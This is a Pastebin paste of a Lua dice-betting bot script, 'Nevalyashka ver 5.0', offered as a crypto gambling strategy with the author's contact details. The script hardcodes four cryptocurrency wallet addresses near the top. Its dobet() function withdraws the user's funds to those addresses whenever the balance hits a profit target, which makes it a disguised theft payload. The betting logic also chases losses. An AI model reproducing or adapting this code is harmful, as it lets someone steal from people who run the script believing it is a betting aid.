Advertisement
Guest User

Untitled

a guest
Nov 3rd, 2017
723
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.90 KB | None | 0 0
  1. -- Nevalyashka ver 5.0.
  2. -- Copyright © 2017, BITCOIN_Capital.
  3. -- Email: bitcoin.capital@yandex.ru , dicebot.script@gmail.com
  4. -- Telegram: @BITCOIN_Capital.
  5. --
  6. btcA = "14QNKBjNgk8w6N4KCRPKWnVMW5v5DfcJYN"
  7. ltcA = "LLUhA5cU8ZQHiqnvt77aWdSdkrvCoWTvRP"
  8. dogA = "D6TUQRzAid6BKZPmgL4Z2qUYA6HG6FeuAg"
  9. ethA = "0x4366cf4ff85c58f0ad8f1aa2d8cdeb7ca7fe854b"
  10. --
  11. function sleep(n)
  12. t0 = os.clock()
  13. while os.clock() - t0 <= n do end
  14. end
  15. --
  16. a = 5
  17. b = balance
  18. d = 0.000001
  19. roundprofit = 0
  20. startbalance = balance
  21. basebet = balance * d
  22. nextbet = basebet
  23. chance = ch ch = 90 ch1 = 10
  24. prof = (balance - b) * 100 / b
  25. --
  26. nCur = currency
  27. print(nCur)
  28. amount = 3100
  29. profittarget = 11000
  30. stoptarget = 5000
  31. if (nCur == "btc")
  32. then
  33. amount = 0.001
  34. profittarget = 0.0030
  35. stoptarget = 0.00000001
  36. elseif (nCur == "ltc")
  37. then
  38. amount = 0.005
  39. profittarget = 0.016
  40. stoptarget = 0.00000001
  41. elseif (nCur == "doge")
  42. then
  43. amount = 100
  44. profittarget = 3200
  45. stoptarget = 0.00004
  46. else
  47. amount = 0.29
  48. profittarget = 0.5
  49. stoptarget = 0.00000001
  50. end
  51.  
  52. resetseed();
  53. resetstats();
  54. --
  55. print("---------------------------------")
  56. print("Nevalyashka ver 5.0")
  57. print("Copyright © 2017, BITCOIN_Capital")
  58. print("Email: bitcoin.capital@yandex.ru")
  59. print("Telegram: @BITCOIN_Capital")
  60. print("---------------------------------")
  61. --
  62. function dobet()
  63. --
  64. sleep(0.2)
  65. if (balance) >= profittarget then
  66. if (nCur == "btc")
  67. then withdraw(amount,btcA)
  68. elseif (nCur == "ltc")
  69. then withdraw(amount,ltcA)
  70. elseif (nCur == "doge")
  71. then withdraw(amount,dogA)
  72. else
  73. withdraw(amount,ethA)
  74. end
  75. print("---------------------------------")
  76. print("Nevalyashka ver 5.0")
  77. print("Copyright © 2017, BITCOIN_Capital")
  78. print("Email: bitcoin.capital@yandex.ru")
  79. print("Telegram: @BITCOIN_Capital")
  80. print("---------------------------------")
  81. resetseed();
  82. end
  83. seedrand = math.random(1,10)
  84. roundprofit += currentprofit
  85. prof = (balance - b) * 100 / b
  86. --
  87. print(" ----------------------------- ----------------------------- ")
  88. print(" Профит: "..string.format("%.8f", profit)..string.format(" %.3f", prof).." % ")
  89. print(" ----------------------------- ----------------------------- ")
  90. print(" Раунд Профит: "..string.format(" %.8f", roundprofit))
  91. print(" ----------------------------- ----------------------------- ")
  92. --
  93. if lastBet.roll < ch then
  94. nextbet = basebet
  95. chance = ch
  96. bethigh = false
  97. end
  98. --
  99. if lastBet.roll > ch then
  100. nextbet = (roundprofit * -1) / a
  101. chance = ch1
  102. bethigh = true
  103. end
  104. --
  105. if nextbet < basebet then
  106. nextbet = basebet
  107. end
  108. if (win) then
  109. nextbet = basebet
  110. end
  111. --
  112. if roundprofit > 0 then roundprofit = 0
  113. newbalance = balance
  114. basebet = balance * d
  115. nextbet = basebet
  116. end
  117. if roundprofit > basebet then
  118. for q=1, seedrand do
  119. resetseed()
  120. end
  121. end
  122. end
  123. if balance <= stoptarget then
  124. stop()
  125. end
  126. end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement